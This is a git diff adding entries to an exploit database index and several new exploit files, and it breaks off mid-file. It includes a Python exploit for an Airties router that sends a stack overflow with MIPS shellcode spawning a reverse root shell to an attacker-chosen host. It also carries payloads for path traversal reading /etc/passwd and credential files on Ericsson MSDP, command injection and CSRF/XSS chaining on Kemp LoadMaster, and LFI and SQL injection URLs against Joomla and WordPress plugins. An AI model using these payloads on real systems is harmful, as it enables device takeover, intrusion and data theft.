diff --git a/files.csv b/files.csv index 7933d15dd..3eb3130ee 100755 --- a/files.csv +++ b/files.csv @@ -32798,9 +32798,9 @@ id,file,description,date,author,platform,type,port 36369,platforms/xml/webapps/36369.txt,"Citrix Netscaler NS10.5 - WAF Bypass Via HTTP Header Pollution",2015-03-12,"BGA Security",xml,webapps,0 36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload (Code Execution)",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0 36371,platforms/php/webapps/36371.txt,"Codiad 2.5.3 - LFI Vulnerability",2015-03-12,"TUNISIAN CYBER",php,webapps,0 -36372,platforms/php/webapps/36372.txt,"Wordpress Theme DesignFolio Plus 1.2 - Arbitrary File Upload Vulnerability",2015-03-04,"Crash bandicot",php,webapps,0 -36373,platforms/php/webapps/36373.txt,"Joomla Simple Photo Gallery 1.0 - Arbitrary File Upload",2015-03-10,"Crash bandicot",php,webapps,0 -36374,platforms/php/webapps/36374.txt,"Wordpress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,"Crash bandicot",php,webapps,0 +36372,platforms/php/webapps/36372.txt,"Wordpress Theme DesignFolio Plus 1.2 - Arbitrary File Upload Vulnerability",2015-03-04,CrashBandicot,php,webapps,0 +36373,platforms/php/webapps/36373.txt,"Joomla Simple Photo Gallery 1.0 - Arbitrary File Upload",2015-03-10,CrashBandicot,php,webapps,0 +36374,platforms/php/webapps/36374.txt,"Wordpress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,CrashBandicot,php,webapps,0 36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 Web Interface Directory Traversal Vulnerability",2011-11-29,"Nick Freeman",asp,webapps,0 36376,platforms/windows/remote/36376.txt,"Oxide WebServer Directory Traversal Vulnerability",2011-11-29,demonalex,windows,remote,0 36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 HTTP POST Request NULL Pointer Content-Length Parsing Remote DoS",2011-11-30,"Luigi Auriemma",multiple,dos,0 @@ -32977,9 +32977,9 @@ id,file,description,date,author,platform,type,port 36557,platforms/windows/local/36557.txt,"HTTrack Website Copier 3.48-21 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0 36558,platforms/windows/local/36558.txt,"UltraISO 9.6.2.3059 - DLL Hijacking",2015-03-30,"TUNISIAN CYBER",windows,local,0 36559,platforms/php/webapps/36559.txt,"Wordpress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download Vulnerability",2015-03-30,ACC3SS,php,webapps,0 -36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,"Crash bandicot",php,webapps,0 +36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL injection vulnerability",2015-03-30,"TUNISIAN CYBER",php,webapps,0 -36563,platforms/php/webapps/36563.txt,"Joomla Gallery WD - SQL Injection Vulnerability",2015-03-30,"Crash bandicot",php,webapps,0 +36563,platforms/php/webapps/36563.txt,"Joomla Gallery WD - SQL Injection Vulnerability",2015-03-30,CrashBandicot,php,webapps,0 36564,platforms/linux/local/36564.txt,"Fedora 21 - setroubleshootd Local Root PoC",2015-03-30,"Sebastian Krahmer",linux,local,0 36565,platforms/php/webapps/36565.txt,"ATutor 2.0.3 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 36566,platforms/php/webapps/36566.txt,"Beehive Forum 101 Multiple Cross Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 @@ -32991,6 +32991,7 @@ id,file,description,date,author,platform,type,port 36572,platforms/php/webapps/36572.txt,"Toner Cart 'show_series_ink.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0 36573,platforms/php/webapps/36573.txt,"MMORPG Zone 'view_news.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0 36574,platforms/php/webapps/36574.txt,"Freelance Zone 'show_code.php' SQL Injection Vulnerability",2012-01-18,Lazmania61,php,webapps,0 +36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0 36579,platforms/windows/remote/36579.rb,"Adobe Flash Player ByteArray With Workers Use After Free",2015-03-31,metasploit,windows,remote,0 36580,platforms/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent XSS Vulnerability",2015-03-31,"Michael Hendrickx",windows,webapps,0 36581,platforms/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,php,webapps,80 @@ -33007,3 +33008,23 @@ id,file,description,date,author,platform,type,port 36592,platforms/php/webapps/36592.txt,"Joomla 'com_sanpham' Component Multiple SQL Injection Vulnerabilities",2012-01-21,the_cyber_nuxbie,php,webapps,0 36593,platforms/php/webapps/36593.txt,"Joomla! 'com_xball' Component 'team_id' Parameter SQL Injection Vulnerability",2012-01-23,CoBRa_21,php,webapps,0 36594,platforms/php/webapps/36594.txt,"Joomla! 'com_boss' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36595,platforms/php/webapps/36595.txt,"Joomla 'com_car' Component Multiple SQL Injection Vulnerabilities",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36596,platforms/php/webapps/36596.txt,"Joomla! 'com_some' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36597,platforms/php/webapps/36597.txt,"Joomla! 'com_bulkenquery' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36598,platforms/php/webapps/36598.txt,"Joomla! 'com_kp' Component 'controller' Parameter Local File Include Vulnerability",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36599,platforms/asp/webapps/36599.txt,"Raven 1.0 'connector.asp' Arbitrary File Upload Vulnerability",2012-01-21,HELLBOY,asp,webapps,0 +36600,platforms/php/webapps/36600.txt,"Wordpress Business Intelligence Plugin - SQL injection",2015-04-02,"Jagriti Sahu",php,webapps,80 +36601,platforms/php/webapps/36601.txt,"Joomla Spider Random Article Component - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80 +36602,platforms/windows/remote/36602.html,"Webgate WESP SDK 1.2 ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 +36603,platforms/windows/remote/36603.html,"WebGate eDVR Manager 2.6.4 AudioOnlySiteChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 +36604,platforms/windows/remote/36604.html,"WebGate WinRDS 2.0.8 PlaySiteAllChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 +36606,platforms/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 +36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 +36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80 +36613,platforms/php/webapps/36613.txt,"Wordpress Simple Ads Manager Plugin - Multiple SQL Injection",2015-04-02,"ITAS Team",php,webapps,80 +36614,platforms/php/webapps/36614.txt,"Wordpress Simple Ads Manager 2.5.94 - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80 +36615,platforms/php/webapps/36615.txt,"Wordpress Simple Ads Manager - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80 +36616,platforms/php/webapps/36616.txt,"phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection",2015-04-02,@u0x,php,webapps,80 +36617,platforms/php/webapps/36617.txt,"WordPress VideoWhisper Video Presentation 3.31.17 - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 +36618,platforms/php/webapps/36618.txt,"VideoWhisper Video Conference Integration 4.91.8 - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 +36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0 diff --git a/platforms/asp/webapps/36599.txt b/platforms/asp/webapps/36599.txt new file mode 100755 index 000000000..f35b8d376 --- /dev/null +++ b/platforms/asp/webapps/36599.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51631/info + +Raven is prone to a vulnerability that lets an attacker upload and execute arbitrary script code in the context of the affected webserver process. The issue occurs because the application fails to sufficiently sanitize user-supplied input. + +Raven 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/[patch]/admin/fck2/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp&ServerPath=/forum/uploads/ + +http://www.example.com/forum/admin/fck2/editor/filemanager/browser/default/browser.html?Connector=connectors/asp/connector.asp&ServerPath=/forum/uploads/ \ No newline at end of file diff --git a/platforms/linux/webapps/36619.txt b/platforms/linux/webapps/36619.txt new file mode 100755 index 000000000..65d807ec5 --- /dev/null +++ b/platforms/linux/webapps/36619.txt @@ -0,0 +1,39 @@ ++------------------------------------------------------------------------------------------------------+ ++ Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal Vulnerability and Arbitrary File Access + ++------------------------------------------------------------------------------------------------------+ +Affected Product: Ericsson Drutt MSDP (Instance Monitor) +Vendor Homepage : www.ericsson.com +Version : 4, 5 and 6 +CVE v2 Vector : AV:N/AC:L/Au:N/C:P/I:N/A:N +CVE : CVE-2015-2166 +Discovered by : Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com] +Patched : Yes + ++-------------+ ++ Description + ++-------------+ +Ericsson Drutt Mobile Service Delivery Platform (MSDP) is a complete business support system providing an SDP center for both on- and off-portal business that includes support for the retail, advertising and wholesale of a wide range of different products and services. The MSDP was originally developed by Drutt Corporation which Ericsson bought back in 2007. Drutt was converted into Ericsson SA SD&P and they are still developing the MSDP. The platform is available in three configurations which also can be combined in the same installation: Storefront, Mobile Marketing and Open Surf. + +The identified vulnerability affects the Instance Monitor component and allows a unauthenticated remote attacker to access arbitrary files on the file system. + ++----------------------+ ++ Exploitation Details + ++----------------------+ +This vulnerability can be triggered via a simple, similar to the below HTTP GET request(s): + + http://:/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd + http://:/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fopt/drutt/msdp/manager/conf/props/msdp-users.properties + http://:/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/opt/drutt/msdp/manager/conf/ccContext.properties + ++---------------------+ ++ Disclosure Timeline + ++---------------------+ +17.Feb.2015 - Contacted Ericsson http://www.ericsson.com/feedback +24.Feb.2015 - Ericsson responded with point of contact at Corporate Security Office +24.Feb.2015 - Contacted Corporate Security Office team +02.Mar.2015 - Ericsson Product Security Incident Response Team reverted via a secure channel +02.Mar.2015 - Shared vulnerability details +06.Mar.2015 - Ericsson confirmed the validity of the issues and started developing the patches +08.Mar.2015 - Agreed on public disclosure timelines +12.Mar.2015 - Patches released +31.Mar.2015 - Public disclosure \ No newline at end of file diff --git a/platforms/multiple/remote/36577.py b/platforms/multiple/remote/36577.py new file mode 100755 index 000000000..9967b6fee --- /dev/null +++ b/platforms/multiple/remote/36577.py @@ -0,0 +1,78 @@ +#!/usr/bin/env python +##################################################################################### +# Exploit for the AIRTIES Air5650v3TT +# Spawns a reverse root shell +# Author: Batuhan Burakcin +# Contact: batuhan@bmicrosystems.com +# Twitter: @batuhanburakcin +# Web: http://www.bmicrosystems.com +##################################################################################### + +import sys +import time +import string +import socket, struct +import urllib, urllib2, httplib + + + + + +if __name__ == '__main__': + + + + + try: + ip = sys.argv[1] + revhost = sys.argv[2] + revport = sys.argv[3] + except: + print "Usage: %s " % sys.argv[0] + + host = struct.unpack('>L',socket.inet_aton(revhost))[0] + port = string.atoi(revport) + + + shellcode = "" + shellcode += "\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5\xff\xfd" + shellcode += "\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c\xaf\xa2\xff\xff" + shellcode += "\x8f\xa4\xff\xff\x34\x0f\xff\xfd\x01\xe0\x78\x27\xaf\xaf\xff\xe0" + shellcode += "\x3c\x0e" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] + shellcode += "\x35\xce" + struct.unpack('>cc',struct.pack('>H', port))[0] + struct.unpack('>cc',struct.pack('>H', port))[1] + shellcode += "\xaf\xae\xff\xe4" + shellcode += "\x3c\x0e" + struct.unpack('>cccc',struct.pack('>I', host))[0] + struct.unpack('>cccc',struct.pack('>I', host))[1] + shellcode += "\x35\xce" + struct.unpack('>cccc',struct.pack('>I', host))[2] + struct.unpack('>cccc',struct.pack('>I', host))[3] + shellcode += "\xaf\xae\xff\xe6\x27\xa5\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27" + shellcode += "\x24\x02\x10\x4a\x01\x01\x01\x0c\x24\x11\xff\xfd\x02\x20\x88\x27" + shellcode += "\x8f\xa4\xff\xff\x02\x20\x28\x21\x24\x02\x0f\xdf\x01\x01\x01\x0c" + shellcode += "\x24\x10\xff\xff\x22\x31\xff\xff\x16\x30\xff\xfa\x28\x06\xff\xff" + shellcode += "\x3c\x0f\x2f\x2f\x35\xef\x62\x69\xaf\xaf\xff\xec\x3c\x0e\x6e\x2f" + shellcode += "\x35\xce\x73\x68\xaf\xae\xff\xf0\xaf\xa0\xff\xf4\x27\xa4\xff\xec" + shellcode += "\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x24\x02\x0f\xab" + shellcode += "\x01\x01\x01\x0c" + + + data = "\x41"*359 + "\x2A\xB1\x19\x18" + "\x41"*40 + "\x2A\xB1\x44\x40" + data += "\x41"*12 + "\x2A\xB0\xFC\xD4" + "\x41"*16 + "\x2A\xB0\x7A\x2C" + data += "\x41"*28 + "\x2A\xB0\x30\xDC" + "\x41"*240 + shellcode + "\x27\xE0\xFF\xFF"*48 + + pdata = { + 'redirect' : data, + 'self' : '1', + 'user' : 'tanri', + 'password' : 'ihtiyacmyok', + 'gonder' : 'TAMAM' + } + + login_data = urllib.urlencode(pdata) + #print login_data + + url = 'http://%s/cgi-bin/login' % ip + header = {} + req = urllib2.Request(url, login_data, header) + rsp = urllib2.urlopen(req) + + + + diff --git a/platforms/multiple/webapps/36609.txt b/platforms/multiple/webapps/36609.txt new file mode 100755 index 000000000..808dba9a9 --- /dev/null +++ b/platforms/multiple/webapps/36609.txt @@ -0,0 +1,150 @@ +# Exploit Title: Kemp Load Master - Multiple Vulnerabilities (RCE, CSRF, XSS, DoS) +# Date: 01 April 2015 +# Author: Roberto Suggi Liverani +# Software Link: http://kemptechnologies.com/load-balancer/ +# Version: 7.1.16 and previous versions +# Tested on: Kemp Load Master 7.1-16 +# CVE : CVE-2014-5287/5288 + +Link: http://blog.malerisch.net/2015/04/playing-with-kemp-load-master.html + +Kemp virtual load master is a virtual load-balancer appliance which comes with a web administrative interface. I had a chance to test it and this blog post summarises some of the most interesting vulnerabilities I have discovered and which have not been published yet. For those of you who want to try it as well, you can get a free trial version here: http://kemptechnologies.com/server-load-balancing-appliances/virtual-loadbalancer/vlm-download + +By default, Kemp web administrative interface is protected by Basic authentication, so the vulnerabilities discussed in the post below can either be exploited attacking an authenticated user via CSRF or XSS based attacks. + +The following vulnerabilities were discovered when looking at Kemp Load Master v.7.1-16 and some of them should be fixed in the latest version (7.1-20b or later). + +Change logs of the fixed issues can be found at the following page: + +"PD-2183 Functions have been added to sanitize input in the WUI in order to resolve some security issues – fix for CVE-2014-5287 and CVE-2014-5288". + +Remote Code Execution - status: fixed in 7.1.20b (reported in June 2014) - CVE-2014-5287/5288 + +An interesting remote code execution vector can be found through the attack payload below: + +http://x.x.x.x/progs/fwaccess/add/1|command + +The web application functionality is based on multiple bash scripts contained in the /usr/wui/progs folder. The application is using CGI so that the scripts can handle HTTP requests. + + +We notice that if the result of the command on line 285 is not positive (check on 286), then seterrmsg function is called. + + +On line 318 we see a dangerous "eval" against our parameters. By simply attempting multiple characters, the seterrmsg function is invoked and returns plenty of interesting information: + +http://x.x.x.x/progs/fwaccess/add/1'ls + +Response: + +HTTP/1.1 200 OK +Date: Sat, 27 Dec 2014 23:25:55 GMT +Server: mini-http/1.0 (unix) +Connection: close +Content-Type: text/html +/usr/wui/progs/util.sh: eval: line 318: unexpected EOF while looking for matching `'' +/usr/wui/progs/util.sh: eval: line 319: syntax error: unexpected end of file + +line 318 contains an eval against the $@ (which contains our arguments). The arguments are passed via the fwaccess page, where IFS is set with a slash "/" separator. + +By attempting the request below, it is possible to achieve code execution: + +http://x.x.x.x/progs/fwaccess/add/1|ls + +Response: + + +Line 120 and line 190 reports an integer expression expected error, as our argument is "1|ls" is obviously no longer an integer. However, the command execution works fine, as we are redirecting output through the pipe character and to "ls" command. + +The application is flawed in so many other points, also, via HTTP POST requests + + +Other injection points that were found: + +Page: /progs/geoctrl/doadd +Method: POST +Parameter: fqdn + +Page: /progs/networks/hostname +Method: POST +Parameter: host + +Page: /progs/networks/servadd +Method: POST +Parameter: addr + +Page: /progs/useradmin/setopts +Method: POST +Parameter: xuser + +So how can we exploit all this goodness? + +CSRF (Cross Site Request Forgery) - status: not fixed - reported in June 2014 + +We can use another vulnerability, such as CSRF - most of the pages of the administrative are vulnerable to this attack, so even though a user is authenticated via Basic authentication, the forged request will force the browser to pass the credentials within the HTTP request. + +Interestingly enough, there are some kind of protections against CSRF for critical functions, such as factory reset, shutdown and reset. However, they are flawed as well, as the "magic" token matches with the unix epoch timestamp, so it is predictable and can be passed within the request. + + +Reflected and Stored XSS - status: partially fixed - reported on June 2014 + +Another way to attack users is via XSS - in this case, we have plenty of options, as both reflected and stored XSS are there. For instance, a user might want to CSRF -> Store XSS -> BeEF just to achieve persistence. + +Reflected XSS was found on this point: + +Page: /progs/useradmin/setopts +Method: POST +Parameter: xuser + + +Stored XSS was found on the following points: + +Page: /progs/geoctrl/doadd +Method: POST +Parameter: fqdn + + +A further injection points: + +Page: /progs/fwaccess/add/0 +Method: POST +Parameter: comment + +Page: /progs/doconfig/setmotd +Method: POST +Parameter: + +BeEF Module + +As part of this research, I have developed a BeEF module to take advantage of chaining these vulnerabilities together. It is always sweet to use a XSS as a starting point to perform code execution against an appliance. + +The github pull request for the module can be found here: https://github.com/beefproject/beef/pull/1104/files + + +For this module, I wanted to use the beef.net.forge_request() function, using a POST method, required to exploit the above RCE vector attacks. However, POST method was not usable at moment of writing this module and @antisnatchor was very quick to fix it in this case. So if you want to try it, ensure you have the latest version of BeEF installed. + + +Extra - bonus + +Denial of Service - status: unknown - reported on June 2014 + +It appears the thc-ssl-dos tool can bring down the Kemp Load Master administrative interface, which is served over SSL. The same goes if a balanced service is using SSL via Kemp Load Master. + +Shell-shock - status: unknown - reported in 2015 + +Obviously, the application is not immune from the infamous shell-shock vulnerability. This was found by my friend Paul Heneghan and then by a user complaining on the vendor's blog (the comment has been removed shortly after). + +For those of you who are more curios, the shell-shock vulnerability works perfectly via the User-Agent header, also in version 7.1-18 and possibly on version 7.1-20 as well. + + + +Funny enough, Kemp provides Web Application Firewall protection, but I wonder how they can "prevent" the OWASP Top Ten (as they claim here), if their main product is affected by so many critical vulnerabilities ;-) + +If you are keen for an extra-extra bonus, keep reading... + +Extra - extra bonus: + +No license, no web authentication + + +However, most of the underlying functionality is still available and "attackable" without need of basic authentication. You can invalidate the license with a CSRF setting time far in the future ;-) + diff --git a/platforms/php/webapps/36595.txt b/platforms/php/webapps/36595.txt new file mode 100755 index 000000000..bf71e5244 --- /dev/null +++ b/platforms/php/webapps/36595.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/51620/info + +The 'com_car' component for Joomla! is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/index.php?option=com_car&view=product&modelsid=[SQLi] +http://www.example.com/index.php?option=com_car&view=product&task=showAll&markid=[SQLi] +http://www.example.com/index.php?option=com_car&brand_id=[SQLi] +http://www.example.com/index.php?option=com_car&view=product&task=detail&markid=6&modelsid=&cid[]=[SQLi] +http://www.example.com/index.php?option=com_car&view=product&markid=&modelsid=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/36596.txt b/platforms/php/webapps/36596.txt new file mode 100755 index 000000000..de4876c4f --- /dev/null +++ b/platforms/php/webapps/36596.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/51621/info + +The 'com_some' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +http://www.example.com/index.php?option=com_some&controller=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/36597.txt b/platforms/php/webapps/36597.txt new file mode 100755 index 000000000..50f5354b2 --- /dev/null +++ b/platforms/php/webapps/36597.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/51622/info + +The 'com_bulkenquery' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +http://www.example.com/index.php?option=com_bulkenquery&controller=../../../../../../../../../../../../../etc/passwd%00 \ No newline at end of file diff --git a/platforms/php/webapps/36598.txt b/platforms/php/webapps/36598.txt new file mode 100755 index 000000000..de8a1223f --- /dev/null +++ b/platforms/php/webapps/36598.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/51623/info + +The 'com_kp' component for Joomla! is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +http://www.example.com/index.php?option=com_kp&controller=[LFI] \ No newline at end of file diff --git a/platforms/php/webapps/36600.txt b/platforms/php/webapps/36600.txt new file mode 100755 index 000000000..be3384f52 --- /dev/null +++ b/platforms/php/webapps/36600.txt @@ -0,0 +1,68 @@ +################################################################################################## +#Exploit Title : Wordpress Plugin 'Business Intelligence' Remote SQL Injection vulnerability +#Author : Jagriti Sahu AKA Incredible +#Vendor Link : https://www.wpbusinessintelligence.com +#Download Link : https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip +#Date : 1/04/2015 +#Discovered at : IndiShell Lab +#Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^ +################################################################################################## + +//////////////////////// +/// Overview: +//////////////////////// + +Wordpress plugin "Business Intelligence" is not filtering data in GET parameter ' t ', which in is file 'view.php' +and passing user supplied data to SQL queries' hence SQL injection vulnerability has taken place. + + + +/////////////////////////////// +// Vulnerability Description: / +/////////////////////////////// + +vulnerability is due to parameter " t " in file 'view.php'. +user can inject sql query using GET parameter 't' + + +//////////////// +/// POC //// +/////////////// + + +POC Image URL---> +================= +http://tinypic.com/view.php?pic=r8dyl0&s=8#.VRrvcuHRvIU + + +SQL Injection in parameter 't' (file 'view.php'): +================================================= + +Injectable Link---> http://server/wp-content/plugins/wp-business-intelligence/view.php?t=1 + +Union based SQL injection exist in the parameter which can be exploited as follows: + + +Payload used in Exploitation for Database name ---> + +http://server/wp-content/plugins/wp-business-intelligence/view.php +?t=1337+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+ + + +### +EDB Note: PoC might need work depending on version of plugin. +The provided software link is for the lite version. +Tested with following PoC: +wp-content/plugins/wp-business-intelligence-lite/view.php?t=1 and 1=1 +wp-content/plugins/wp-business-intelligence-lite/view.php?t=1 and 1=2 +### + + +################################################################################################### + + + --==[[Special Thanks to]]==-- + + # Manish Kishan Tanwar ^_^ # + + diff --git a/platforms/php/webapps/36601.txt b/platforms/php/webapps/36601.txt new file mode 100755 index 000000000..51e02e51f --- /dev/null +++ b/platforms/php/webapps/36601.txt @@ -0,0 +1,54 @@ +################################################################################################## +#Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability +#Author : Jagriti Sahu AKA Incredible +#Vendor Link : http://demo.web-dorado.com/spider-random-article.html +#Date : 22/03/2015 +#Discovered at : IndiShell Lab +#Love to : error1046 ^_^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^_^ +################################################################################################## + +//////////////////////// +/// Overview: +//////////////////////// + + +joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters +and hence affected by SQL injection vulnerability + +/////////////////////////////// +// Vulnerability Description: +/////////////////////////////// +vulnerability is due to catID and Itemid parameter + + +//////////////// +/// POC //// +/////////////// + + +SQL Injection in catID parameter +================================= + +Use error based double query injection with catID parameter + +Injected Link---> + +Like error based double query injection for exploiting username ---> +http://server/index.php?option=com_rand&catID=1' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13 + + +SQL Injection in Itemid parameter +================================= + +Itemid Parameter is exploitable using xpath injection + +http://server/index.php?option=com_rand&catID=1&limit=1&style=1&view=articles&format=raw&Itemid=13'and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- - + +################################################################################################### + + + --==[[Special Thanks to]]==-- + + # Manish Kishan Tanwar ^_^ # + + diff --git a/platforms/php/webapps/36613.txt b/platforms/php/webapps/36613.txt new file mode 100755 index 000000000..1af39ad15 --- /dev/null +++ b/platforms/php/webapps/36613.txt @@ -0,0 +1,219 @@ +#Vulnerability title: Wordpress plugin Simple Ads Manager - SQL Injection +#Product: Wordpress plugin Simple Ads Manager +#Vendor: https://profiles.wordpress.org/minimus/ +#Affected version: Simple Ads Manager 2.5.94 and 2.5.96 +#Download link: https://wordpress.org/plugins/simple-ads-manager/ +#CVE ID: CVE-2015-2824 +#Author: Le Hong Minh (minh.h.le@itas.vn) & ITAS Team + + +::PROOF OF CONCEPT:: + +---SQL INJECTION 1--- + ++ REQUEST: + +POST /wp-content/plugins/simple-ads-manager/sam-ajax.php HTTP/1.1 +Host: target.com +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/28.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://target.com/archives/wordpress-plugin-simple-ads-manager/ +Content-Length: 270 +Cookie: wooTracker=cx5qN1BQ4nmu; _ga=GA1.2.344989027.1425640938; PHPSESSID=kqvtir87g33e2ujkc290l5bmm7; cre_datacookie=8405688a-3dec-4d02-9405-68f53281e991; _gat=1 +Connection: keep-alive +Pragma: no-cache +Cache-Control: no-cache + +action=sam_hits&hits%5B0%5D%5B%5D=&hits%5B1%5D%5B%5D=&hits%5B2%5D%5B%5D=&level=3 + + +- Vulnerable file: simple-ads-manager/sam-ajax.php +- Vulnerable code: + + case 'sam_ajax_sam_hits': + if(isset($_POST['hits']) && is_array($_POST['hits'])) { + $hits = $_POST['hits']; + $values = ''; + $remoteAddr = $_SERVER['REMOTE_ADDR']; + foreach($hits as $hit) { + $values .= ((empty($values)) ? '' : ', ') . "({$hit[1]}, {$hit[0]}, NOW(), 0, \"{$remoteAddr}\")"; + } + $sql = "INSERT INTO $sTable (id, pid, event_time, event_type, remote_addr) VALUES {$values};"; + $result = $wpdb->query($sql); + if($result > 0) echo json_encode(array('success' => true, 'sql' => $sql, 'addr' => $_SERVER['REMOTE_ADDR'])); + else echo json_encode(array( + 'success' => false, + 'result' => $result, + 'sql' => $sql, + 'hits' => $hits, + 'values' => $values + )); + } + break; + + + + +---SQL INJECTION 2--- ++REQUEST +POST /wp-content/plugins/simple-ads-manager/sam-ajax-admin.php HTTP/1.1 +Host: hostname +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest + +action=load_posts&cstr=&sp=Post&spg=Page + ++ Vulnerable file: simple-ads-manager/sam-ajax-admin.php ++ Vulnerable code: +case 'sam_ajax_load_posts': + $custs = (isset($_REQUEST['cstr'])) ? $_REQUEST['cstr'] : ''; + $sPost = (isset($_REQUEST['sp'])) ? urldecode( $_REQUEST['sp'] ) : 'Post'; + $sPage = (isset($_REQUEST['spg'])) ? urldecode( $_REQUEST['spg'] ) : 'Page'; + + //set @row_num = 0; + //SELECT @row_num := @row_num + 1 AS recid + $sql = "SELECT + wp.id, + wp.post_title AS title, + wp.post_type AS type + FROM + $postTable wp + WHERE + wp.post_status = 'publish' AND + FIND_IN_SET(wp.post_type, 'post,page{$custs}') + ORDER BY wp.id;"; + + $posts = $wpdb->get_results($sql, ARRAY_A); + + $k = 0; + foreach($posts as &$val) { + 